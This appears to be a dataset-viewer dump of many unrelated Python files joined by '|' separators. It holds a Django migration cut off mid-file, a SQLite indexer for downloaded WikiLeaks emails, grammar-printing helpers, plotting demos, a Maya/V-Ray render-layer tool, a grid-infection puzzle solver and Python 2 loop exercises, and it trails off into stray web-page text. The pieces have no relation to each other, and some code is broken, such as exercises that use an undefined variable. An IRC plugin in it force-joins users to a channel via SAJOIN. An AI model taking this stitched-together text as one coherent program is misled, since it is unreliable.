fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('league_name', models.TextField()),
('start_date', models.DateField()),
('end_date', models.DateField()),
('reg_start_date', models.DateField()),
('reg_end_date', models.DateField()),
],
),
migrations.CreateModel(
name='Sport',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sport_name', models.TextField()),
('logo_url', models.TextField()),
('is_active', models.BooleanField()),
],
),
migrations.CreateModel(
name='Team',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('team_name', models.TextField(default='My Team')),
('league', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.league')),
('players', models.ManyToManyField(to='main.Account')),
],
),
migrations.AddField(
model_name='league',
name='sport',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.sport'),
),
migrations.CreateModel(
name='Game',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_time', models.DateField()),
('home_score', models.IntegerField(null=True)),
('away_score', models.IntegerField(null=True)),
('away_team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='away_team', to='main.team')),
('home_team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='home_team', to='main.team')),
('league', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.league')),
],
),
]
|
#!/usr/bin/env python3
import sqlite3
import os.path
import os
import re
import hashlib
with sqlite3.Connection('wikileaks.db') as db:
try:
cur = db.cursor()
##
# Add the original_name field
##
# for r in cur.execute('SELECT * FROM podesta_emails').fetchall():
# cur.execute('INSERT INTO podesta_emails2(id, path, url, original_name, size, md5, sha1, sha256) VALUES (?, ?, ?, ?, ?, ?, ?, ?)', (
# r[0], # id
# r[1], # path
# r[2], # url
# os.path.basename(r[1]), # original_name
# r[3], # size
# r[4], # md5
# r[5], # sha1
# r[6] # sha256
# ))
##
# Fix the podesta paths
##
# for r in cur.execute('SELECT id, original_name FROM podesta_emails').fetchall():
# cur.execute('UPDATE podesta_emails SET path = ? WHERE id = ?', (
# 'podesta-emails/{0:0>5}_{1}'.format(r[0], r[1]),
# r[0]
# ))
##
# Read a dnc/ folder produced by WikileaksEmailDownloader.py
##
# pattern = re.compile(r'^(\d{5})_(.+)$')
# for f in os.listdir('dnc/'):
# m = pattern.match(f)
# id, name = m.groups()
# id = int(id)
# url = f'https://wikileaks.org/dnc-emails/get/{id}'
# size = os.path.getsize(f'dnc/{f}')
# path = f'dnc-emails/{f}'
# with open(f'dnc/{f}', 'rb') as f:
# data = f.read()
# md5sum = hashlib.md5(data).hexdigest()
# sha1sum = hashlib.sha1(data).hexdigest()
# sha256sum = hashlib.sha256(data).hexdigest()
# cur.execute('INSERT INTO dnc_emails(id, path, url, original_name, size, md5, sha1, sha256) VALUES(?, ?, ?, ?, ?, ?, ?, ?)', (
# id, path, url, name, size, md5sum, sha1sum, sha256sum
# ))
db.commit()
finally:
cur.close() |
def inspect(item, grammar_name='G', mapper=None):
try:
return mapper[item]
except (TypeError, KeyError ):
if isinstance(item, dict):
items = ',\n '.join(f'{inspect(key, grammar_name, mapper)}: {inspect(value, grammar_name, mapper)}' for key, value in item.items() )
return f'{{\n {items} \n}}'
elif isinstance(item, ContainerSet):
args = f'{ ", ".join(inspect(x, grammar_name, mapper) for x in item.set) } ,' if item.set else ''
return f'ContainerSet({args} contains_epsilon={item.contains_epsilon})'
elif isinstance(item, EOF):
return f'{grammar_name}.EOF'
elif isinstance(item, Epsilon):
return f'{grammar_name}.Epsilon'
elif isinstance(item, Symbol):
return str(item)
elif isinstance(item, Sentence):
items = ', '.join(inspect(s, grammar_name, mapper) for s in item._symbols)
return f'Sentence({items})'
elif isinstance(item, Production):
left = inspect(item.Left, grammar_name, mapper)
right = inspect(item.Right, grammar_name, mapper)
return f'Production({left}, {right})'
elif isinstance(item, tuple) or isinstance(item, list):
ctor = ('(', ')') if isinstance(item, tuple) else ('[',']')
return f'{ctor[0]} {("%s, " * len(item)) % tuple(inspect(x, grammar_name, mapper) for x in item)}{ctor[1]}'
else:
raise ValueError()
def pprint(item):
if isinstance(item, dict):
for key, value in item.items():
print(f'{key} ---> {value}')
elif isinstance(item, list):
print('[')
for x in item:
print(f' {repr(x)}')
print(']')
else:
print(item) |
# Generated by Django 2.1.7 on 2019-08-18 19:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('frame', '0003_auto_20190818_1930'),
]
operations = [
migrations.AlterField(
model_name='framemodel',
name='mean',
field=models.DecimalField(decimal_places=2, max_digits=10),
),
migrations.AlterField(
model_name='framemodel',
name='median',
field=models.DecimalField(decimal_places=2, max_digits=10),
),
migrations.AlterField(
model_name='framemodel',
name='mode',
field=models.DecimalField(decimal_places=2, max_digits=10),
),
migrations.AlterField(
model_name='framemodel',
name='standard_deviation',
field=models.DecimalField(decimal_places=2, max_digits=10),
),
]
|
from sirmoDBMSnew import DBaccess
SirmoDB = DBaccess("SirmotechBMS")
SirmoDB.connectDB()
SirmoDB.addNewConsultant('Niki', 'White', '2019-02-03', '1979-10-25', '4','3')
SirmoDB.addNewConsultant('Sandy', 'Thompson', '2015-04-10', '1986-11-05', '1','1')
SirmoDB.removeConsultant("Niki","White")
SirmoDB.getMinHourlyRateAVG()
SirmoDB.getConsultantInfo()
SirmoDB.getConsultantRolePay()
SirmoDB.connectDBClose() |
__module_name__ = 'care.py'
__module_version__ = '1.0'
__module_description__ = 'Sajoin to #care Plugin'
__module_author__ = 'Ferus'
import xchat
def isChan():
net = (xchat.get_context()).get_info('network')
if net == 'DatNode':
return True
else:
return False
def lols(word, word_eol, userdata):
if isChan():
try:
msg = word[1].replace(",","").split()
if msg[1] == '#care':
# users = xchat.get_list('users')
person = msg[0]
# for i in users:
# if person == i.nick:
xchat.command("RAW SAJOIN {0} #care".format(person))
except:
pass
return None
xchat.hook_print("Your Message", lols)
print("Loaded {0}, version {1}".format(__module_name__, __module_version__))
|
# import tkinter
# import
import matplotlib.pyplot as plt
# import matplotlib
import numpy as np
# plt.ion()
t = np.arange(0.0, 2.0, 0.01)
s = 1 + np.sin(2 * np.pi * t)
fig, ax = plt.subplots(nrows=2, ncols=2)
# fig, ax = plt.subplots()
ax[0,1].plot(t, s)
ax[0,1].set(xlabel='time', ylabel='voltage', title='about as simple')
ax[0,1].grid()
fig.subplots_adjust(hspace=0.3, wspace=0.3)
plt.show(block=False)
x1=np.linspace(0.0, 5.0)
x2=np.linspace(0.0, 2.0)
y1=np.cos(2*np.pi*x1)*np.exp(-x1)
y2=np.cos(2*np.pi*x2)
fig, (ax1, ax2)=plt.subplots(2,1)
fig.suptitle("A tale of 2 subplots")
ax1.plot(x1, y1, 'o-')
ax2.plot(x2, y2, '.-')
ax1.set_ylabel('Damped oscillation')
ax2.set_ylabel('Undamped')
plt.show()
|
favorite_languages = {
'jen' : 'Python',
'sarah' : 'c',
'edward' : 'ruby',
'phil' : 'Python'
}
# para descobrir se uma pessoa em particular participou da enquete.
if 'Alex' not in favorite_languages.keys():
print('Desculpe seu nome nao está na lista')
print('Por favor participe de nossa enquete!')
|
# !/usr/bin/#!/usr/bin/env python3
print("Content-type: text/html")
print()
print("<h1> Hello stranger</h1>")
|
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'vlanSync.settings'
import django
django.setup()
from sync.SyncHandler import SyncHandler
from sync.models import LocalVlans, RemoteVlans, Tmp
def main():
SyncHandler.startSync()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# "Unless you know the code, it has no meaning." ~ John Connolly
__author__ = "hero24"
# Python 2 Memoization example:
def fib(n,mem=[0]):
# Example of fibonacci sequence with use of memoization
if n < len(mem):
return mem[n]
else:
if n < 2:
res = n
mem += [res]
else:
res = fib(n-1) + fib(n-2)
mem += [res]
return res
|
#!/usr/bin/python
"""
-----------------------------------------------
Auto Layer Shadow Render Layers
Written By: Colton Fetters
Version: 1.0
First release: 2/17/2017
-----------------------------------------------
"""
import os
import maya.cmds as cmds
import maya.mel as mel
import render_layers as render_layers
import xgen as xgen
reload(render_layers)
reload(xgen)
class CreateVrayRenderElements(object):
def create_dirt(self, layerName=''):
"""
Create Vray Dirt Render Layer
@param layerName: String of Layer Name
@return: None
"""
renderElement = mel.eval('vrayAddRenderElement ExtraTexElement;')
renderElement_name = cmds.rename(renderElement, '{}_Contact_Shadow_AO'.format(layerName))
vrayDirt = cmds.shadingNode('VRayDirt', asTexture=True)
vrayDirt_shader = cmds.rename(vrayDirt, "{}_Contact_Shadow_AO_Shader".format(layerName))
# Create 2d placement node and connect to vray dirt
place2D = cmds.shadingNode("place2dTexture", asUtility=True)
place2D_name = cmds.rename(place2D, "{}_AO_Place2d".format(layerName))
cmds.connectAttr(place2D_name + ".outUV", vrayDirt_shader + ".uv", force=True)
cmds.connectAttr(place2D_name + ".outUvFilterSize", vrayDirt_shader + ".uvFilterSize", force=True)
# Connect vray dirt to vray render element
cmds.connectAttr(vrayDirt_shader + ".outColor", renderElement_name + ".vray_texture_extratex", force=True)
cmds.setAttr(renderElement_name + ".vray_explicit_name_extratex", "Contact_Shadow_AO", type="string")
# sett vray dirt attributes specific to DTX contact shadow settings
cmds.setAttr(vrayDirt_shader + ".blackColor", 1, 1, 1, type="double3")
cmds.setAttr(vrayDirt_shader + ".whiteColor", 0, 0, 0, type="double3")
cmds.setAttr(vrayDirt_shader + ".ignoreSelfOcclusion", 1)
cmds.setAttr(vrayDirt_shader + ".resultAffectInclusive", 0)
cmds.select(clear=True)
def create_matte_shadow(self, *args):
"""
Create Vray Matte Shadow Render Element
@param args:
@return:
"""
renderElement = mel.eval('vrayAddRenderElement matteShadowChannel;')
matteShadow_name = cmds.rename(renderElement, "Matte_Shadow")
cmds.setAttr("{}.vray_name_matteshadow".format(matteShadow_name), "Matte_Shadow", type="string")
class ShadowOptions(object):
def contact_shadow(self, cast=None, receive=None, layerName=''):
# Check to see if the geometry has been selected
fullList_geo = cmds.ls(cast, receive)
cmds.select(fullList_geo)
cmds.createRenderLayer(name="{}_Contact_Shadow".format(layerName), makeCurrent=True, noRecurse=True)
render_layers.GlobalRenderSettings().general_settings(layerName)
cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doShadows")
cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doLights")
cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doDefaultLights")
cmds.setAttr("vraySettings.globopt_light_doShadows", 0)
cmds.setAttr("vraySettings.globopt_light_doLights", 0)
cmds.setAttr("vraySettings.globopt_light_doDefaultLights", 0)
CreateVrayRenderElements().create_dirt(layerName)
self.cast_vis_off(cast)
self.contact_receive(receive, layerName)
self.lambert_over_ride(fullList_geo)
def cast_shadow(self, cast=None, receive=None, layerName=''):
# Check to see if the geometry has been selected
fullList_geo = cmds.ls(cast, receive)
cmds.select(fullList_geo)
cmds.createRenderLayer(name="%s_Cast_Shadow" % layerName, makeCurrent=True, noRecurse=True)
render_layers.GlobalRenderSettings().general_settings(layerName)
cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doShadows")
cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doLights")
cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doDefaultLights")
cmds.setAttr("vraySettings.globopt_light_doShadows", 1)
cmds.setAttr("vraySettings.globopt_light_doLights", 1)
cmds.setAttr("vraySettings.globopt_light_doDefaultLights", 0)
CreateVrayRenderElements().create_matte_shadow()
self.cast_vis_off(cast)
self.cast_recieve(receive)
self.lambert_over_ride(fullList_geo)
def cast_vis_off(self, cast=None):
# Casts
cmds.select(clear=True)
for each in cast:
try:
geoShapes = cmds.listRelatives(each, allDescendents=True, type="shape")
for shape in geoShapes:
try:
cmds.setAttr('%s.primaryVisibility' % shape, 0)
cmds.setAttr('%s.receiveShadows' % shape, 0)
except RuntimeError:
print('Error with %s Node' % each)
except TypeError:
print('Error with %s Node' % each)
def contact_receive(self, receive=None, layerName=''):
# Receive
cmds.select(clear=True)
selectedObjects = cmds.ls(receive)
cmds.select(selectedObjects)
newSet = cmds.sets()
setName = cmds.rename(newSet, "%s_Occlusion_Receive_Set" % (layerName))
print(setName + ".usedBy[0]")
cmds.connectAttr(setName + ".usedBy[0]", "%s_Contact_Shadow_AO_Shader.resultAffect" % (layerName))
def cast_recieve(self, receive=None):
# Casts
for each in receive:
geoShapes = cmds.listRelatives(each, allDescendents=True, type="shape")
try:
for shape in geoShapes:
try:
cmds.setAttr('%s.castsShadows' % shape, 0)
cmds.setAttr('%s.receiveShadows' % shape, 1)
except RuntimeError:
print('Error with {} Node'.format(each))
except TypeError:
print('Error with {} Shape Node'.format(each))
def lambert_over_ride(self, selList, color='White'):
curLayer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
show = os.getenv('BD_PROD')
if show == 'WDS':
cmds.sets(name="{}_Matte_SG".format(color),
renderable=True, noSurfaceShader=True, empty=True)
cmds.shadingNode('VRayMtl', name="{}_Matte_Shader".format(color), asShader=True)
cmds.setAttr("{}_Matte_Shader.color".format(color), 1, 1, 1, type="double3")
cmds.select(selList)
geo = cmds.ls(dag=1, o=1, s=1, sl=1)
for i in geo:
geoSG = cmds.listConnections(i, type='shadingEngine')
try:
for each in geoSG:
cmds.editRenderLayerAdjustment("{}.surfaceShader".format(each))
shaders = cmds.ls(cmds.listConnections(each), materials=1)
try:
cmds.disconnectAttr("{}.outColor".format(shaders[0]), "{}.surfaceShader".format(each))
cmds.connectAttr("{}_Matte_Shader.outColor".format(color), "{}.surfaceShader".format(each))
except RuntimeError:
pass
except TypeError:
pass
else:
override = cmds.shadingNode('lambert', asShader=True)
lamShader = override + 'SG'
lamConnect = override + '.outColor'
shaderConnect = lamShader + '.surfaceShader'
cmds.sets(renderable=True, noSurfaceShader=True,
empty=True, name=lamShader)
cmds.connectAttr(lamConnect, shaderConnect)
mel.eval('hookShaderOverride(\"' + curLayer + '\",\"\",\"' + override + '\")')
# Determine the Render Elements in the scene
for shader in cmds.ls(type='VRayDirt'):
if 'AO' in shader:
if show == 'WDS':
cmds.setAttr(shader + '.radius', 2.5)
cmds.setAttr(shader + '.distribution', 5)
cmds.setAttr(shader + '.subdivs', 30)
else:
cmds.setAttr(shader + '.radius', 200)
cmds.setAttr(shader + '.distribution', 1.5)
cmds.setAttr(shader + '.subdivs', 16)
|
ids = ['315880575', '205847932']
def get_neighbors(coordinates, board_size, exclude=tuple()):
# gets the coordinates of the neighboring tile
neighbors = list()
if coordinates[0] != 0 and (coordinates[0] - 1, coordinates[1]) not in exclude:
neighbors.append((coordinates[0] - 1, coordinates[1]))
if coordinates[1] != 0 and (coordinates[0], coordinates[1] - 1) not in exclude:
neighbors.append((coordinates[0], coordinates[1] - 1))
if coordinates[0] != board_size[0] - 1 and (coordinates[0] + 1, coordinates[1]) not in exclude:
neighbors.append((coordinates[0] + 1, coordinates[1]))
if coordinates[1] != board_size[1] - 1 and (coordinates[0], coordinates[1] + 1) not in exclude:
neighbors.append((coordinates[0], coordinates[1] + 1))
return neighbors # left down right up
def get_neighbors_neighbors(coordinates, board_size, exclude=tuple()):
non = list()
neighbors = get_neighbors(coordinates, board_size, exclude)
for n in neighbors:
nn = get_neighbors(n, board_size, exclude)
non.append([])
for tile in nn:
if tile not in non and tile != coordinates:
non[-1].append(tile)
return non # [[LL, LD, LU], [DL, DD, DR], [RD, RR, RU], [UL, UU, UR]]
def get_tile_status(input, tile, turn=0, exclude=tuple()): # input is input and tile is a tuple representing the tile requested
if input["observations"][turn][tile[0]][tile[1]] != '?':
return input["observations"][turn][tile[0]][tile[1]]
unknown = True
for n in range(len(input["observations"])):
if input["observations"][n][tile[0]][tile[1]] == 'U':
return "U"
if input["observations"][n][tile[0]][tile[1]] != '?':
unknown = False
exclude += tuple([tile])
neighbors = get_neighbors(tile, (len(input["observations"][0]), len(input["observations"][0][0])), exclude)
neighbors_neighbors = get_neighbors_neighbors(tile,
(len(input["observations"][0]), len(input["observations"][0][0])),
exclude)
n_curr_status = [n for n in [get_tile_status(input, t, turn, exclude) for t in neighbors]]
nn_curr_status = list()
for nn in neighbors_neighbors:
nn_curr_status.append([n for n in [get_tile_status(input, t, turn, exclude) for t in nn]])
# attempting to see if at any point the tiles around it were affected
infected = (False, 0)
ever_infected = False
tn = 0
while unknown and tn < len(input["observations"]):
infected = (True, infected[1]-1) if infected[1] > 1 else (False, 0)
n_cr_stts = [n for n in [get_tile_status(input, t, tn, exclude) for t in neighbors]]
nn_cr_stts = list()
for nn in neighbors_neighbors:
nn_cr_stts.append([n for n in [get_tile_status(input, t, tn, exclude) for t in nn]])
if tn > 0:
n_pre_stts = [n for n in [get_tile_status(input, t, tn - 1, exclude) for t in neighbors]]
if any([n == "S" for n in n_pre_stts]):
if not infected[0]:
infected = (True, 3)
ever_infected = True
if tn < len(input["observations"]) - 1:
n_nxt_stts = [n for n in [get_tile_status(input, t, tn + 1, exclude) for t in neighbors]]
for i in range(len(neighbors)):
# if a nieghbor becomes sick and its for certain that it wasnt any other tile that infected it
if n_cr_stts[i] == "H" and n_nxt_stts[i] == "S" and all([n != "S" for n in nn_cr_stts[i]]):
unknown = False # not Uninhabited situation
elif infected[0] and n_cr_stts[i] == "H" and n_nxt_stts[i] == "H" \
and all([n != "S" for n in nn_cr_stts[i]]):
return "U"
tn += 1
if unknown:
if turn > 2 and not ever_infected:
return "Not S"
return "None"
if turn > 0:
n_prev_status = [n for n in [get_tile_status(input, t, turn-1, exclude) for t in neighbors]]
if get_tile_status(input, tile, turn-1, exclude) == 'S' and turn < 3:
return "S"
if get_tile_status(input, tile, turn-1, exclude) == 'H':
if all([n != "S" for n in n_prev_status]):
return "H"
if turn >= 3:
if all([i == "S" for i in [get_tile_status(input, tile, n, exclude) for n in range(turn-3, turn)]]):
return "H"
elif get_tile_status(input, tile, turn-1, exclude) == 'S':
return "S"
# did the tile get infected?
if any([n == "S" for n in n_prev_status]):
return "S"
if turn < len(input["observations"]) - 1:
n_next_status = [n for n in [get_tile_status(input, t, turn + 1, exclude) for t in neighbors]]
for i in range(len(neighbors)):
# if a nieghbor becomes sick and its for certain that it wasn't any other tile that infected it
if n_curr_status[i] == "H" and n_next_status[i] == "S" and all([n != "S" for n in nn_curr_status[i]]):
return "S"
if n_curr_status[i] == "H" and n_next_status[i] == "H" and all([n != "S" for n in nn_curr_status[i]]):
return "H"
return "Not U"
def solve_problem(input):
results = dict()
for query in input["queries"]:
result = get_tile_status(input, query[0], query[1])
if result == "None":
results[query] = '?'
elif result == "Not S":
results[query] = 'F' if query[2] == 'S' else '?'
elif result == "Not U":
results[query] = 'F' if query[2] == 'U' else '?'
elif result == query[2]:
results[query] = 'T'
elif result != query[2]:
results[query] = 'F'
else:
results[query] = '?'
return results
|
def valid_parentheses(pairs):
results = []
def inner(prefix, remain_pairs, extra_close):
assert remain_pairs >= 1
new_prefix_base = prefix + '(' # Always add an '(' at the begining
max_close = extra_close + 1
new_remain_pairs = remain_pairs - 1
if new_remain_pairs == 0:
results.append(new_prefix_base + ')'*max_close)
else:
for i in range(max_close+1):
inner(new_prefix_base+')'*i, new_remain_pairs, max_close-i)
inner('', pairs, 0)
return results
def check_valid(s):
n = 0
for c in s:
if c == '(':
n += 1
elif c == ')':
assert n > 0
n -= 1
else:
assert False
assert n == 0
def test_1(pairs=6):
results = valid_parentheses(pairs)
for s in results:
check_valid(s)
return results
if __name__ == "__main__":
for s in test_1():
print(s)
|
# Generated by Django 3.2 on 2021-04-18 20:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('oauth', '0007_profile_profile_photo'),
]
operations = [
migrations.AlterModelOptions(
name='profile',
options={'ordering': ['-points']},
),
migrations.AddField(
model_name='profile',
name='friends',
field=models.ManyToManyField(null=True, related_name='_oauth_profile_friends_+', to='oauth.Profile', verbose_name='Friend list'),
),
]
|
# Problem 1
# My solution
x = 0
while (x <= 10):
x += 2
print x
print 'Goodbye!'
# Best practice
num = 2
while num < 11:
print num
num += 2
print "Goodbye!"
# Problem 2
print "Hello!"
num = 10
while num > 0:
print num # print the num first
num -= 2
# Problem 3
total = 0
current = 1
while current <= end:
total += current # total = total + current, 1
current += 1 # 1st, current = 2
print total
# Finding the cube root of some number
x = int(raw_input('Enter an integer: '))
ans = 0
while ans**3 < x:
ans = ans + 1
if ans**3 != x:
print(str(x) + ' is not a perfect cube')
else:
print('Cube root of ' + str(x) + ' is ' + str(ans))
# problem 1 to 3
myStr = '6.00x'
for char in myStr:
print char
print 'done'
greeting = 'Hello!'
count = 0
for letter in greeting:
count += 1
if count % 2 == 0:
print letter
print letter # this line means the letter will get printed anyway
print 'done'
school = 'Massachusetts Institute of Technology'
numVowels = 0
numCons = 0
for char in school:
if char == 'a' or char == 'e' or char == 'i' \
or char == 'o' or char == 'u':
numVowels += 1
elif char == 'o' or char == 'M':
print char
else:
numCons -= 1
print 'numVowels is: ' + str(numVowels)
print 'numCons is: ' + str(numCons)
count = 0
for letter in 'Snow!':
print 'Letter # ' + str(count) + ' is ' + str(letter)
count += 1
break
print count
# Compare to this one:
num = 10
for var in range(5):
print var
print num
for variable in range(20):
if variable % 4 == 0:
print variable
if variable % 16 == 0:
print 'Foo!'
# L3 PROBLEM 5A
# 1
for var in range(2, 12, 2):
print var
print 'Goodbye!'
# 2
print 'Hello!'
for var in reversed(range(2, 12, 2)):
print var
# 3
# Example:
total = 0
current = 1
while current <= end:
total += current # total = total + current, 1
current += 1 # 1st, current = 2
print total
total = 0
for var in range(1,end+1):
total += var
# print total this is printing total in the for loop
print total # this is printing total at the end for once.
# L3 PROBLEM 6
iteration = 0
count = 0
while iteration < 5:
for letter in "hello, world":
count += 1 # count get added for each letter in the string hello world
print "Iteration " + str(iteration) + "; count is: " + str(count)
iteration += 1
iteration = 0
while iteration < 5:
count = 0 # This reset count back to 0 at the begining of every interation
for letter in "hello, world":
count += 1
print "Iteration " + str(iteration) + "; count is: " + str(count)
iteration += 1
iteration = 0
while iteration < 5:
count = 0
for letter in "hello, world":
count += 1
if iteration % 2 == 0:
break
print "Iteration " + str(iteration) + "; count is: " + str(count)
iteration += 1
for iteration in range(5):
count = 0
while True:
for letter in "hello, world":
count += 1
print "Iteration " + str(iteration) + "; count is: " + str(count)
break
count = 0
phrase = "hello, world"
for iteration in range(5):
index = 0
while index < len(phrase):
count += 1
index += 1
print "Iteration " + str(iteration) + "; count is: " + str(count)
count = 0
phrase = "hello, world"
for iteration in range(5):
while True:
count += len(phrase)
break
print "Iteration " + str(iteration) + "; count is: " + str(count)
count = 0
phrase = "hello, world"
for iteration in range(5):
count += len(phrase)
print "Iteration " + str(iteration) + "; count is: " + str(count)
# Finding the sqrt of a num
x = 25
epsilon = 0.01
step = 0.1
guess = 0.0
while guess <= x:
if abs(guess**2 -x) < epsilon:
break
else:
guess += step
if abs(guess**2 - x) >= epsilon:
print 'failed'
else:
print 'succeeded: ' + str(guess)
x = 25
epsilon = 0.01
step = 0.1
guess = 0.0
while abs(guess**2-x) >= epsilon:
if guess <= x:
guess += step
else:
break
if abs(guess**2 - x) >= epsilon:
print 'failed'
else:
print 'succeeded: ' + str(guess)
# L3 PROBLEM 9
print("Please think of a number between 0 and 100!")
# At the start the highest the number could be is 100 and the lowest is 0.
hi = 100
lo = 0
guessed = False
# Loop until we guess it correctly
while not guessed:
# Bisection search: guess the midpoint between our current high and low guesses
guess = (hi + lo)/2
print("Is your secret number " + str(guess)+ "?")
user_inp = raw_input("Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed correctly. ")
if user_inp == 'c':
# We got it right!
guessed = True
elif user_inp == 'h':
# Guess was too high. So make the current guess the highest possible guess.
hi = guess
elif user_inp == 'l':
# Guess was too low. So make the current guess the lowest possible guess.
lo = guess
else:
print("Sorry, I did not understand your input.")
print('Game over. Your secret number was: ' + str(guess)) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.